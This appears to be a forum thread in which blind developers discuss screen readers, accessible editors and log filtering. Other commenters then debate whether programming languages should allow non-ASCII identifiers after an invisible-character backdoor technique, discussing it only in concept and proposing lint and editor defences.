The next time someone tries to tell me that a true screen reader should use computer vision and machine learning (including OCR) rather than requiring applications to implement accessibility APIs, I will bring up this case.
"Why can't we just, you know, direct blind users to a special protocol that structures the data appropriately and then lets them parse it however they want?"
Me: 'We did! It's called HTML! Designers just broke it!'
IMO, HTML is still closer to that ideal than anything else we have. My guess is that given a random web application and a random non-web GUI (especially if the latter is multi-platform), the web application will be more usable with a screen reader.
I'd say markdown is even better than HTML for writing generic documents since it enforces simplicity. In particular, it forces a linear flow of the document and does not have any support for stuff like JS.
Is it possible for a developer to make a canvas accessible? For example, pronounce "You are on the road that goes from left to right, there is a shop above you and an inn below", like a MUD.
Real accessibility is about presenting the same information your other users have. So, instead of you typing the description, let each of the drawn objects have its own description and make them discoverable and navigable. I think Google was trying to make Flutter 2 components accessible, but it means starting from zero and building the same stuff anew.
Html could have been that - or better, it was at first - but instead of creating a more specialized solution for running rich apps we decided to exploit html.
Right now we are in what I'd call the worst of both worlds, because we rely on HTML to do things it wasn't designed for, and there's no longer purity in any HTML out in the wild.
How hard is it to program while being blind? What sort of development do you do? I understand that frontend is impossible, but what other difficulties do you face?
Are indent-based languages like Python harder than bracket-based languages?
Front end is not entirely impossible, just impossible for pixel-perfect designs. Otherwise, I know blind people who do FE, though I'm not sure how much of it is professional work.
Indent based languages are actually easier. Every screen reader has a way to announce indentation in code, while brackets could be confusing if not formatted or verbose if properly announced.
My main issues are dev tools with bad accessibility. Also, it takes me more time to get acquainted with new code, and sometimes homophones in the source code require extra attention. Filtering through logs is also a bitch in most cases. Besides the dev tools, you can summarize the rest as bad IO speed.
Do you have some tricks for how you handle filtering through logs? Or some ideas if there could be a tool that could help you or mitigate your most critical issue[s]?
I found filtering through logs a major pain even as a fully sighted person, so I wrote a tool to help me with that, but it's fully in a "TUI" paradigm (i.e. curses-like), so I presume it wouldn't help you much (https://github.com/akavel/up). No promises, given that the tool as-is scratched my itch, but I am honestly curious whether something similar could reduce your PITA, including whether this specific tool could be made useful for you through some minimal effort on my side.
Usually grep saves the day. I will check your tool, but what I need is a terminal command that can recognize the meta fields of a log record and put them on a line separate from the main message. Also, it must be installed everywhere I work, which is not so easy. Putting logs in a table with filtering capabilities might be best, but this means web access to the location of the logs, which is again tricky.
The idea of my tool is not really to help with some specific way of processing logs, but rather to make it easier to fiddle with grep and other Linux CLI filtering tools by shortening the feedback loop compared to the normal shell REPL. I'm not sure if that sounds in any way clear; it might also sound strange that the shell REPL is IMO too slow, or that this matters at all, but I found it enough of a problem that I invented a way to speed it up, and judging from the reception the tool got, it seemed to hit a nerve with quite a few people.

I can try to explain more if you are interested and/or don't really understand what I might even be talking about. I tried to explain it in the readme, but for many reasons I have not the slightest freaking idea to what extent it is understandable to you - not least because, for fully sighted people, one important way I tried to convey the idea is through an animated GIF of a terminal window showing how the tool is used. As someone said, with really innovative ideas it's often necessary to push them down people's throats to make them understood; this GIF is part of that effort, and fortunately seems quite effective, but even it is not enough for some people, and I'm assuming by default that it's for obvious reasons completely inaccessible to you.

I was pondering just now whether copying this animation to asciinema could make it in any way more accessible to you, but as of now I have strong doubts whether that would work at all (including that I have no idea whether the asciinema site is accessible to you at all, and that I suspect the terminal ANSI sequences generated by a library I'm using are "tiniest diffs", so although the result might look indistinguishable to fully sighted people, a screen reader might [or might not???] take them at face value and read them as a mess of random jumps and single-character changes on the screen).

That said, I'm more than happy if you managed to understand what the tool is doing and just don't think it could be useful to you, whether as is or with some accessibility improvement attempts. Or if you don't understand but don't feel like diving deeper either.
Usually by serializing each message as a single JSON line in a file.
Since it's all on one line you can still use grep, and since it's machine-readable you can pipe the grep output to anything that can parse JSON. Vanilla python3 works and tends to be part of most ops toolkits. Such tooling can split the fields out onto separate lines, or into a more reader-friendly format.
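To make that concrete, here is a minimal sketch of the idea (the script name and the "message" field name are just assumptions; adapt them to whatever your logger emits):

#!/usr/bin/env python3
# split_jsonl.py (hypothetical name): read JSON-per-line log records on stdin
# and print each meta field on its own line, then the message, then a blank line.
import json
import sys

for raw in sys.stdin:
    raw = raw.strip()
    if not raw:
        continue
    try:
        rec = json.loads(raw)
    except json.JSONDecodeError:
        print(raw)                      # pass non-JSON lines through untouched
        continue
    message = rec.pop("message", "")    # assumed field name
    for key, value in rec.items():
        print(f"{key}: {value}")        # one meta field per line
    print(message)
    print()

Then something like `grep ERROR app.log | python3 split_jsonl.py` keeps grep in the loop while making the output linear and easier to listen through.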
I've been struggling with eye strain and have considered trying to approach development in a fashion similar to that taken by blind devs. Any suggestions for guides or overviews for how I can get set up?
It depends on what you are working on and what you want to do. Generally, screen readers are not as good for programming as they are for plain text, so they will be a limited substitute for whatever you are using now. If you are okay with working slower, they can help you listen through code and tools' messages, providing relief for your eyes.
If you are using Windows, NVDA is the screen reader. JAWS is a bit too expensive for my taste without any significant edge over NVDA. The built-in Narrator is still immature in my opinion. VSCode has excellent accessibility with a dedicated and involved team. Visual Studio also has extremely good accessibility support, though I'm not using it. IntelliJ sucks. Not completely, but enough that people do not see the benefit of using it. Eclipse is not popular these days, but it has good accessibility as well, as far as I know. Sublime is not accessible.
If you are on Linux, the screen reader is Orca. It does not have the same level of support as the Windows stuff, but I know people who develop on Linux boxes, so it is doable. Emacs must be good enough, because it has a self-voicing plugin and people who like and use it. As far as I know, VSCode for Linux has some accessibility features, but I don't know how they compare to Windows.
If you are on Mac, your only choice of screen reader is VoiceOver by Apple. It is good but not always perfect, to my knowledge. I know people who use TextMate, Xcode, VSCode, and Emacs, but I don't have much feedback from there. It is totally doable though.
On Windows, I'm also using notepad++ as a secondary editor because it is faster and works better for large files. Also, it is a good note-taking tool.
We can connect offline if you need some more info.
I am very interested in how blind developers work. I have been pondering how to make computers and development more accessible. If you don't mind:
Do you have preference between CLI, TUI, or GUI dev tools?
Is highly symbolic code harder to understand using a screen reader than plain language code? By symbolic, I specifically mean any characters that are not alphanumeric.
I don't have preferences about the interface. As long as it is accessible, I can learn to work with it. E.g. VSCode does everything possible to make its interface accessible, and they continuously fix any reported issues.
When it comes to code, verbose is better. Abbreviations take effort to decode. I can remap some symbols to have different pronunciations, but it does not always work. E.g. I've made the screen reader speak the ":=" operator in Python as "assigned from", but brackets have nesting and orientation, and too many of them get nasty to listen to or follow.
It would be really cool to be able to hook into where words started and ended. Then you could add a background tone/frequency rising in pitch with indentation level (and maybe have no tone for the root level).
Oh, if only speech engines broke down the utterance process and made it more open...
Indentation level is a solved problem, and the start and end of words is also customizable behavior. Speech engines as a whole are open to customization. There are some problems, though, that are just not easy to solve at all. It is like with regular expressions and HTML. Hooking the SR into the language server might be an avenue of possible improvements, but the problem definition on my side is currently too vague to formulate correctly.
I've just realized I assumed speech-to-text and text-to-speech were similarly complex and unincentivized toward open development. (I wanted to play around with augmenting speech-to-text for some time.) TIL.
So how is indentation level typically handled?
And what other types of customizations are typically leveraged from an output-device standpoint? (Maybe there's a reference I can google for?)
Comparing the problem space to regular expressions and HTML immediately makes sense, that's a very intuitive way of putting it.
I can relate to being completely stumped about how to replace missing functionality with software, in my case organizing information (which is impaired because of autism). What does the problem space around the text-to-speech vagueness look like?
Screen readers have the benefit that they have two parts. One of them is the "explorer" so to call it and the other one is a synthesizer. The explorer hooks to the accessibility services and apis of the host system and produces a text representation of the objects discovered. The synthesizer receives the text representations and maps them to sound output.
The easiest way of customization is to get between those two parts and to convert the representation through some rules, regex for example. That's how my rule with the ":=" operator works.
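As a rough illustration (this is not any screen reader's actual API, just the shape of such a rule set):

import re

# Illustrative substitution rules applied to the text representation
# before it is handed to the synthesizer.
RULES = [
    (re.compile(r":="), "assigned from"),
    (re.compile(r"!="), "not equal to"),
]

def preprocess(text):
    for pattern, spoken in RULES:
        text = pattern.sub(spoken, text)
    return text

print(preprocess("total := price * qty"))  # "total assigned from price * qty"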
Indentation could be done either by announcing the number of spaces/tabs at the start of the line, or by defining how many of a given symbol make up one level and assigning a sound to each level that is played when the level changes. There is an option for doing both.
Screen readers have apis for extensions or scripts for more complex functionality. You can check those of Jaws and NVDA for examples. The apis are rather extensive and they allow for lots of customizations like improving support for a given program or general modification of the sr behavior.
I was thinking/imagining more along the lines of being able to drill down into phoneme pronunciation: adding micro-pauses to certain syllables or pitch-bending them based on rules, for example, or having a firehose of machine-readable annotations for a given utterance, including the exact start and end times/samples of individual phonemes in the audio stream. You could then mix your own audio track with additional augmentations into the final output, for example using your own synthesizer to modulate background tones representing the current indentation level. Yes, ridiculously complex; but by front-loading that complexity (and winning the data accessibility fights) it would be possible to do a lot of cool stuff...
I understand some people swear by JAWS as the generally best-in-class solution, which has admittedly put me off NVDA, as I feel I'd absorb a biased sense of what's possible or of how audio output software works in general. I guess I should just install NVDA already since it's the realistic option - if I started testing stuff in JAWS and talking about it, the only reasonable assumption people could make would be that I was using a copy that had drifted ashore from the high seas, which would be kind of true...
Depending on what synthesizer you use, you might be able to get into its internals. Keep in mind that each screen reader can use different synthesizers, so both JAWS and NVDA might use eSpeak, the Windows core voices, or something totally different.
In regard to the idea that Jaws is best in class, I'm inclined to disagree. Jaws might be a bit better in MS Office applications and UIA support, I haven't used it for years. However, NVDA has the better web story and until recently it was the screen reader that was actually working with VS Code.
I see, I'll have to have a deeper look. (I'm on Linux, so I think my options are espeak and possibly Festival.)
Thanks very much for the perspective on NVDA. I'll definitely have to give it a go! I've been interested specifically in Web accessibility for quite a while.
Well, this is highly subjective. I'm paid to do Python and Node.js from time to time, and Python really rocks for me. No small reason why I like Python more is the much better tracebacks. When viewed in a console, it is much more pleasant to have the erroring line at the bottom, which spares me copying the entire console into npp to hunt for the top of it.
That said, I know many blind devs who do Java, C#, Swift, C++ and so on. I had bad experiences with IDEs when I was starting to study software development in those languages and it has stayed with me, but it is not universal.
If I had the choice, I would not drop Python, but I might add some of the functional languages or Rust for the new ways of thinking they might teach me. So far I've looked at them, but I haven't done anything serious there.
With NVDA on Windows, when I read the comment normally, it's spelled out. When I read it character by character, I get "symbol FFF8" for each of the hidden Unicode characters. And when I move line by line through NVDA's linear representation of the web page, the hidden characters count against the length of the line for the purpose of word wrapping.
Narrator's behavior is weirder. If I turn on scan mode and move onto the line with the up or down arrow key, Narrator says nothing. If I read the current line with Insert+Up Arrow, Narrator spells it out like NVDA does. When moving character by character, Narrator says nothing for the hidden Unicode characters. And because Narrator doesn't do its own line wrapping but defers to the application to determine what counts as a line, the text only counts as one line.
Disclosure: I used to work on the Windows accessibility team at Microsoft, on Narrator among other things.
Still, it would not occur to most sighted programmers to review code using a screen reader. To me, this is another argument for having a truly diverse team (or community, in the case of an open-source project); a blind programmer who's already involved with the project would catch something like this. So in this particular case, blindness is truly not a disability.
Listen guys, don't get me wrong. As someone with Ø in my name, and both Å and Ø in my address, don't get me started on poorly written systems which cannot handle unicode properly. I've seen my name and address mangled in shipping forms, in airline tickets (every time) and even in my marriage-papers since I married abroad.
I literally have personal reasons for getting everyone, and I mean everyone, on the unicode bandwagon.
That said... Maybe it's because I'm a child of the late 70s and early 80s and learned to program on computers which simply didn't have non-ASCII characters at all...
But can't we all just sit down and admit that allowing non-ASCII characters in programming-language identifiers was a bad idea? Can't we, in the next revision of EcmaScript (or Rust, or whatever), mandate ASCII-only identifiers when in strict mode or using modules or whatever? Having invisible characters represent executable code is not just a dumb idea, it's so hazardous that you might call it borderline malicious.
There has to be some way to undo this damage, without breaking compatibility with the code which is already out there, right?
You can only type ~27% of my name with just ASCII (and even then one letter will not be exact)... and I agree with you. If anything I'd go a bit further and say that, sure, use Unicode in places where you can find arbitrary text like documents, messages, etc., but anything that has to do with the 'guts' of the computer should stay away from Unicode (or at least treat it as data, like how filenames are treated on Linux).
I disagree with getting everyone on the Unicode bandwagon though. IMO Unicode has introduced a ton of problems exactly because it tries to be a ton of stuff at the same time. I don't know exactly what a better solution would look like, but I have a very hard time accepting that such a convoluted and error-prone system is the best solution. IMO if decades later there are still issues with getting it right, then there is something fundamentally wrong with the system itself and not with the applications and developers trying to work with it.
An existing working solution, even if not perfect, patched, with a lot of baggage and technical debt, is infinitely better than a not-yet-invented ideal, perfect solution.
And even if the perfect solution existed right now, in a few decades it would be as filled with baggage as the current one.
Sometimes one has to realize that hard problems are hard.
Adding a variable decorator/annotation like @Unicode(german,french) would be a good stop-gap. You could only use ASCII characters unless you specified the script that you want to use. One could even set a max limit on how many scripts per variable. Because while I have used German characters in variables before (only if I'm referring to some law or spec), I never had a use case for more than 2 scripts within one variable.
The multiple-scripts-per-variable thing is implemented in Rust via a lint. For the explicit enabling of single scripts, I have suggested that for Rust, but sadly people preferred allowing all identifiers (while giving an option to allow only ASCII, but I'd argue this is unfair to anyone who only wants to use a specific non-ASCII language: why should they suddenly have to allow all languages in their code base?). There are also practical concerns, like who says what a language is, which characters it contains, what that language is called, etc.? Someone has to maintain all these lists.
For your information the relevant Unicode specification is the Script_Extensions property [1]. (You can't easily filter by languages, so you should filter by scripts.)
I think this is a good idea because once in a while you need to write non-ascii characters in names.
This mostly comes up when implementing tax rules or government administrative divisions as some countries have names/concepts which have no good translation into English, so you are left with using the non-English name, which often contains non-ASCII characters.
The issue with this is less that this is possible and more that a lot of javascript ends up in production without ever getting compiled, linted, type-checked, etc. Stuff like this is designed to bypass what little human oversight there is to prevent bad things from happening. What is actually visible also depends on what fonts you have installed on your system. So, it's less clear cut than you think.
The problem is not so much that humans can't see this but that they are not looking very hard to begin with (otherwise, they'd be using the appropriate tools) and that we should rely less on them actively looking. Blind trust that things will be fine is the root problem here.
> The problem is not so much that humans can't see this but that they are not looking very hard to begin with (otherwise, they'd be using the appropriate tools) and that we should rely less on them actively looking.
And simply not allowing non-ASCII identifiers in the first place would be a move in that direction. Now you have one thing less to look for.
> But can't we all just sit down and admit that allowing non-ASCII characters in programming-language identifiers was a bad idea?
It's a bad idea only if all members in your team can easily produce and comprehend an ASCII-only code.
> Having invisible characters represent executable code is not just a dumb a idea, it's so hazardous that you might call it borderline malicious.
Not if those invisible characters do affect the rendering. Invisible formatting characters like ZWJ and ZWNJ are allowed because they are used in some scripts. The relevant Unicode specification [1] even provides a guideline to limit ZWJ and ZWNJ strictly to the context where they do affect the rendering.
That said, the Hangul filler and half-width Hangul filler were mistakes. They are purely legacy characters and never have been used in practice, so I encourage new languages to exclude them from the default (X)ID_Start/Continue set (Unicode can't do that because of the compatibility, maybe they can introduce another pair of properties without those characters).
> The relevant Unicode specification [1] even provides a guideline to limit ZWJ and ZWNJ strictly to the context where they do affect the rendering.
Which is exactly what I am suggesting by saying non-ASCII characters should be banned from being used as identifiers, not from being present in the code-file all together or in the form of strings, etc.
If the formatting of your output in your applications (as seen by the user) depends on the names you've declared your variables with, then you are doing something horribly wrong.
You seem to think of those formatting characters as something that should live in a higher-level protocol like HTML. They are not. They are used when two consecutive abstract characters can be combined in two or more different ways, and those different renderings frequently have different meanings. That's why they can't be simply removed when normalized; doing so would destroy the text.
We seem to be talking past one another. What I'd like to see banned is non-ASCII in identifiers (variable names and the like) and nothing else.
While you respond as if I want to banish anything non-ASCII from all parts of all code-files except from HTML-templates. That’s certainly not what I’m advocating.
The following is IMO perfectly fine:
var greeting = “Hello (cowboy emoji)”;
The following is IMO not:
var (emoji) = “Let’s party!”; // note identifier contains non-ascii
Do you still disagree? If so, can you outline why?
Okay, I think I see where you got confused. There are multiple levels of Unicode identifier support and you are probably not aware of all possible levels. Those levels are:
1. Identifiers can contain any octet with the highest bit set. Different octet sequences denote different names.
2. Identifiers can contain any Unicode code point (or scalar value, the fine distinction is not required here) above U+007F. Different (but possibly same-looking) code point sequences denote different names.
3. Identifiers can contain any Unicode code point in a predefined set, or two if the first character and subsequent characters are distinguished. Different code point sequences denote different names.
4. Same as 3, but these predefined sets derive from the Unicode Identifier and Pattern Syntax specification [1]---namely (X)ID_Start/Continue.
5. Same as 4, but now identifiers are normalized according to one of the Unicode normalization algorithms. So some different code point sequences now map to the same name, but only if they are semantically the same according to Unicode.
6. Same as 5, but also has rules to reduce unwanted identifiers. This may include confusable characters, virtually indistinguishable names and names with multiple unrelated scripts. Unicode itself provides many guidelines in the Unicode Security Mechanisms standard [2].
Levels 3, 4 and 5 are the most common choices in programming languages. In particular, emojis are not allowed at level 4, so your example wouldn't work in such languages. For example, JavaScript is one of them, so `eval('var \u{1f600} = 42')` doesn't work (where U+1F600 is a smiling face). Both Python and Rust are at level 5. Possibly unexpectedly, both C and C++ are at level 3. Levels 1 and 2 are rare, especially in modern languages; PHP is a famous example of level 1.
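A quick way to see level 5 in action in Python (just an illustration): U+2126 OHM SIGN is NFKC-normalized to U+03A9 GREEK CAPITAL LETTER OMEGA, so both spellings name the same variable.

import unicodedata

print(unicodedata.normalize("NFKC", "\u2126") == "\u03a9")  # True

exec("\u2126 = 42")   # define a variable spelled with OHM SIGN
print(Ω)              # read it back spelled with GREEK CAPITAL OMEGA: prints 42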
Level 6 is a complex topic and there are varying degrees of implementations (for example Rust partially supports the level 6 via lints), but there is a notable example outside of programming languages: the Internationalized Domain Names. They have very strong constraints because any pair of confusable labels is a security problem. It seems that they have been successful in keeping the security of non-ASCII domains on par with ASCII-only domains, that is, not fully satisfactory but reasonable enough. (If you don't see the security issues of ASCII-only domains, PaypaI and rnastercard are examples of problematic ASCII labels that were never forbidden.)
I argue that the level 3+ is necessary and the level 5+ is desirable for international audiences. The level 5 would for example mean that `var 안녕하세요 = "annyonghaseyo";` (Korean) is allowed but `var (emoji) = "oh no";` is forbidden. I have outlined why the former is required in the last paragraph of [3]. Does my clarified stance make sense to you?
To be clear, I’m completely oblivious to what Unicode identifiers are. As such I’m not talking about them, and they are out of scope with regard to my point.
What I am advocating is that identifiers used for symbols in the programming language (variables-names, function-names, class-names, etc), should be strictly ASCII-based.
That’s simple, understandable and should be a sane default anywhere.
My opinion is that since nobody without a doctorate in Unicode actually fully understands Unicode, having a rule-set for identifiers built on top of the already bewildering Unicode rule-set is a sure-fire way to engineer for unexpected consequences and/or security issues.
Sure. Allow it if you must. But you must opt in to use it. It should be a non-default feature everywhere where it’s available.
> That’s simple, understandable and should be a sane default anywhere.
This is the usual canned reason given to reject any internationalization effort, and it is likely only "simple, understandable" and "a sane default anywhere" to people like you. As you didn't explain why they are simple and understandable in general, I don't see how your arguments are universally applicable.
> My opinion is that since nobody without a doctorate in Unicode actually fully understands Unicode, having a rule-set for identifiers built on top of the already bewildering Unicode rule-set is a sure-fire way to engineer for unexpected consequences and/or security issues.
That can be said about almost all security issues, not just Unicode. That doesn't make you avoid writing anything, does it? For the record, it is a valid choice to not write anything, but we normally exclude that choice when we are talking about the technology. And the "bewildering Unicode rule-set" is a one-off thing; it is not as though Unicode produces incompatible standards every year. (Python 3 adopted Unicode identifiers 14 years ago [1] and implementations never changed, only the underlying databases have been updated.)
Ideally that lint would be on by default though. Most code doesn't use non-ASCII identifiers. It hasn't happened, though, because of, uhm, political reasons.
Most code made by English speakers contains English words and Latin characters, so other languages and alphabets must be abandoned, and their native speakers must be imprisoned until they understand their mistakes.
First thing I did when I first read the story was check my editor. I already had the "Zero Width Characters locator" plugin installed, but that covered less than a handful of specific space character type codes.
Still, the result was good: Looks like IDEA editors like Webstorm show invisible characters with colored background and a warning.
My test, both for that first article and now for this one, was to copy the example code they contained or linked to from the browser into an open file.
Interesting. PhpStorm highlights the variable after `timeout` but does not highlight the variable after `http://example.com/`. Even pressing F2 to go to the next error goes to the first variable (the highlighted one) but not the second.
However, placing the cursor on either does highlight the second.
I'm using the Darcula scheme. Your screenshot obscures the second occurrence, so we cannot see if your light theme has the same issue with the second occurrence not being highlighted as Darcula has.
You are right, I missed the other one, it is not reported. You can see there is something because it takes space, but you have to deliberately go there to see it. There also is no warning from having the "No trailing spaces" setting active, so it is not seen as a space character even if it shows as such.
I'll write an issue on YouTrack; I'm sure they'll fix it. Of the well over a hundred issues I have ever reported, about two thirds were fixed (the rest are obsolete, only a few are really still open).
Yes, I file bug reports with lots of places, and Jetbrains is one of the best for actually doing something with them. It is one of the few non-FOSS applications that I am willing to integrate into my workflow (hmm, the only one I think).
EDIT (new comment because edit-period is long gone):
It's not too severe an issue, maybe not one at all(?), at least in this concrete example, because after removing the first occurrence of the hidden variable it now becomes a "not defined" real error and not just a warning in the second location.
Some time ago I managed to add a zero-width character to my PHP code. Because it had no width, PhpStorm did not highlight it and I had absolutely no clue why there was an error in my code.
So it only highlights when it has width.
Edit: just added some non-space characters and at least in Rider they are now displayed as a warning. So I think this is fixed now.
While not as fancy, font choice may save you here too. I use vim and while the editor doesn't treat this character as special, my font (Iosevka term) doesn't include this character, and so it's rendered as the generic "missing unicode" glyph with the code inside it.
A similar thing to the Reddit post mentioned in the article happened to me too: I used a not-a-space character that looks like a space once, the text editor autocompletion remembered it and would occasionally substitute it for space. The code looked OK, but compilation failed or threw syntax errors in run time. This continued for several years until I completely reinstalled the editor, with full cleanup.
Hey, you have missed U+FFA0 HALFWIDTH HANGUL FILLER which has about the same property as U+3164 HANGUL FILLER!
I surely expected this coming ever since I saw the purported Trojan "attack", as the Hangul fillers are pretty much the only characters that are (X)ID_Start and have no visible glyphs [1]. If (X)ID_Continue is also considered, ZWJ and ZWNJ would be other contenders. Attacks using those characters have a much better chance than the Trojan "attack", but you need very specific code to execute the attack. It should be obvious that a typical coding convention easily prevents them.
Much like the purported Trojan "attack", this kind of attack needs better code review and tooling. You don't need to remove non-ASCII identifiers from existing languages: they have their uses when the entirety of your team speaks languages not written in the Latin script. But you should be able to catch a new use of non-ASCII characters throughout your code base and compare that with your expectation.
[1] The Hangul filler comes from a legacy mechanism of KS X 1001 for unencoded Hangul syllables (it had only 2,350 out of 11,172 modern syllables). The half-width Hangul filler probably comes from a duplicate encoding of the filler in the IBM code page 933 to ensure round-trip conversion. Both are never used in practice, except for probably the Hangul filler that was briefly implemented by Mozilla and removed due to the compatibility issue.
Perhaps one could do something similar in JS as well. Like have a config that makes an interpreter fail if it encounters unescaped Unicode in variable names. It does not prevent any Unicode variable names, but you just have to escape them if they are from some list of "abusable characters".
(At least Chrome seems to be happy with `var \u6D4B\u8BD5 = 1;`)
Yes, we do. People from all over the world write software too. They should be able to use the words they know in code.
Also, it's totally cool to have mathematical symbols in code. λ, for example. Much more readable than the word lambda. The only reason these symbols are hard to type is our keyboards suck. They can be made easy to type with editor support though.
>Yes, we do. People from all over the world write software too. They should be able to use the words they know in code
My native language has non-ASCII characters and I do not expect nor do I want to be able to type them outside string literals. Specifically for the reasons stated in the blog post, among others. Writing in my native language is far, far down in the list of priorities as a professional coder, when security / compatibility are there too. Suggesting that non-native English speakers have to be able to code in their native language also would suggest that non-native coders do not take security / compatibility seriously, which would mean that they are unprofessional. I'm pretty sure that it's not your intention to suggest that, but that's kind of how it comes across. With all the problems eliminated by the use of English and ASCII, it would strike me as amateurish to not use English and ASCII wherever possible.
> non-native coders do not take security / compatibility seriously
That's not what I said at all. I don't see how you came to this conclusion.
> With all the problems eliminated by the use of English and ASCII, it would strike me as amateurish to not use English and ASCII wherever possible.
Not everybody speaks english. I've taught programming to quite a few people and they all attempted to use normal characters while writing code. There's absolutely no reason why that shouldn't work. I don't see how characters like ç or ã or ü could possibly cause security issues. Go ahead and ban the invisible unicode stuff but there's absolutely no reason why these common letters shouldn't work.
It is funny that you are using the existence of a segment of the population that I am a part of, to make your claim but aren't willing to listen when a member of the segment is trying to explain how non-ASCII characters and coding do not mix well.
Sure, you could make a fix for this specific case, but the problem mentioned in the blog post is not even close to the only problem of non-ASCII characters. In theory, yes, we could make a language and a full suite of tooling that would play nice with non-ASCII characters. But it's not like the whole non English speaking world is waiting for this to happen. People code in English even in teams where everyone speaks Finnish. Nobody even questions it, because it's so obvious that all code should be in English and ASCII. Everyone has shot their foot, putting in non-ASCII characters in the source code at some point of their career, if they have ever dared to try. That's how the reality is, and at the same time I hear people saying that the existence of those Finnish programmers means we have to have Unicode in source code.
>That's not what I said at all. I don't see how you came to this conclusion.
I didn't say you said it. I said that's how it (probably accidentally) comes across when you talk about something so carelessly. Non English speakers care about compatibility and security and take those seriously, therefore we pretty much always write code in English and ASCII.
> It is funny that you are using the existence of a segment of the population that I am a part of, to make your claim but aren't willing to listen when a member of the segment is trying to explain how non-ASCII characters and coding do not mix well.
Why is it funny? I'm also a member of that group. English is not my native language.
> But it's not like the whole non English speaking world is waiting for this to happen.
I don't think we should have to wait for this to happen. In many ways, it's already happened: most modern languages already support unicode symbols.
> People code in English even in teams where everyone speaks Finnish. Nobody even questions it, because it's so obvious that all code should be in English and ASCII.
Relatively few people speak english in my country. I have only a few friends who do. A whole team of people writing code in english just doesn't seem likely where I live. I actually tried writing english code in such a context once, the result was a mixed language mess that I quickly reverted back to my native language. Unicode support is great because it makes the non-english code much more readable.
Europeans in general seem to know english very well. This is not the case everywhere. Somehow making english a requirement for programming just doesn't sound fair to me.
It applies to other contexts besides code. For our user table we have a MariaDB collation based on the Unicode confusables list, which avoids confusable usernames (they are treated as already existing).
Good code is maintainable code. And while you, as the original programmer, might be perfectly comfortable writing your code using Arabic variables and comments, what if the next person who has to maintain the code is from Korea? Or Russia? Or France? Or China?
OK, maybe you're a small startup in Taiwan and so you don't care about the next maintainer in your company not being able to read or write Chinese. What if you decide to open source your code? Or Meta decides to offer you a zillion dollars to buy you out, but after they do their due diligence they realize the code is utterly unmaintainable: they want to outsource internationalizing the code so it will work in Brazil, which requires native Portuguese speakers (who can preferably be paid low, low wages), but those people can't understand the code because it's using Chinese variables and comments. And then Meta decides to back out of the deal?
If you're likely to work with an international team, it makes sense to use english. That's not always the case though. Plenty of those low-paid brazilian programmers you cited will never do that. Many of them don't speak english to begin with.
For example, the school I went to had a simple web application for student feedback. Attachments were allowed. People started running into issues due to non-ASCII characters in file names. I reported the issue to the IT department and even helped them fix it. The Python code was written in portuguese, accents and everything. Why shouldn't accents be used in this case? It's unlikely this code will ever be used in an international context.
ASCII is the standard for code for good reason. Everyone can type it. Put whatever you want in comments, but you shouldn't make people have to copy/paste your variable names.
It won't. The same approach works just fine in your build specification or other config files. And it doesn't solve the root of this problem, which is that you are compiling source code you don't control and don't audit closely into your binary. Sneaky text is not the only way of getting malicious code through code review.
> 1. It creates a security consideration with confusable identifiers (and lints don't always catch these)
O/0 and I/1/l are confusable characters within ASCII. I'm not kidding here, they are actual entries in the Unicode confusables database [1]. But no one wants to remove those characters from identifiers.
> 3. It may not render correctly depending on fonts
So does Unicode in comments and string literals. In fact the purported Trojan "attack" was mostly about string literals. So why should they be allowed in strings but disallowed in identifiers?
> 4. It may be hard to type depending on keyboard layout
Did you know that not every Latin keyboard layout supports a backquote (`)? This was the actual reason that the repr(expr) shortcut got removed from Python 3 [2].
> 5. There really isn't a good reason to use non-ASCII idents anyway
My canonical answer from experience is that not every programmer who can understand English documentation can easily write and comprehend English in general. For those people, non-ASCII identifier support is a great relief, as it frees them from choosing "correct" English identifiers. You can disallow them for your project if you want (or conversely, make them an optional feature disabled by default), but they are relevant for someone else.
> it frees them from choosing "correct" English identifiers
Even if you have fluent English skills, sometimes translations just confuse the issue. It's sometimes better to use an untranslated word instead of introducing ambiguity, especially when a term originates from a local law.
> O/0 and I/1/l are confusable characters within ASCII.
You're mixing up two different ways that people use the word "confusable": things that look similar in some fonts, versus things that look exactly the same regardless of font. I want the latter to be banned from source files but not the former.
Confusables are a defined concept in Unicode [1]. And there seems no other good way to define "confusables", since many if not most pairs of characters are distinguishable in some but not all fonts and you can always make a font that distinguishes every code point (I once did that, for example distinguishing Latin-Greek-Cyrillic homoglyphs in subtle ways).
But we are talking about Unicode identifiers, and the Unicode recommendation doesn't allow BiDi markers in identifiers and has a provision to limit the use of ZWJ and ZWNJ in them.
Non-ASCII identifiers can be useful for maths too. E.g. I use λ sometimes, especially in Python where "lambda" is a keyword. (I have AutoHotKey and Espanso hotstrings to make typing such symbols easy.)
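Purely illustrative:

λ = lambda x: x ** 2   # the keyword "lambda" is taken, the letter λ is not
print(λ(4))            # 16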
This argument seems to assume that people who do not know English cannot figure out how to use ASCII character set for identifiers. If so, it is rather incorrect. Is there something else here, maybe?
The compiler disallowing them globally might count as that. But individual crates enforcing an "ascii only" policy makes sense, if they never plan to use non-ascii.
Personally I'd prefer even one step further: the compiler would disallow them by default, and you can opt into specific character sets/languages at a crate level. e.g. `AllowSpecialCharacters("de")` to enable on special characters common in German.
There's definitely a benefit to using a linter and a tool such as prettier. Using prettier pushes the hidden character onto an additional line in the checkCommands array which makes it much easier to spot that something is wrong even if you're not using the trailingCommas setting.
I think this eslint rule would also be able to defend against the initial destructuring of the query object, by defining a regex that identifiers have to match which would exclude those invisible characters: https://eslint.org/docs/rules/id-match
I imagine this can be defended against pretty easily with a lint rule that prevents these Unicode characters in variables. Pretty ingenious little hack though.
The eslint rule id-match, which requires identifiers to match a specified regular expression, would be useful here; for example, a pattern that only permits ASCII characters in identifiers would exclude these invisible ones.
A malicious PR could also add the character to your eslintrc too though. You'd be forgiven for seeing the line change in the diff and thinking it was just some reformatting.
That would show up in a diff and would hopefully elicit a question in code review about why the .eslintrc file was being changed in this way. This is another good argument for a comprehensive code review process.
Also, you could lock this file down with a CODEOWNERS file so only certain trusted contributors could modify the lint configuration. You could also do exclusionary pattern matching to make sure none of the bad characters exist in identifier names... Or you could write your eslint configuration as a separate module to be npm installed... or you could write an eslint rule plugin that disallows non-ASCII identifiers and then npm install that... lots of different ways to skin this cat to add security.
It seems like things displaying diffs could use a specific color for lines only changed by formatting or indentation (indentation can have significant meaning like in Python but this would probably be good enough)
I believe that Git diff - which has features not supported by regular diff such as --word-diff - can differentiate between whitespace-only line changes. The Jetbrains IDE, which I believe uses Git diff behind the scenes, will show who originally wrote a line even if it has been whitespace-reformatted later.
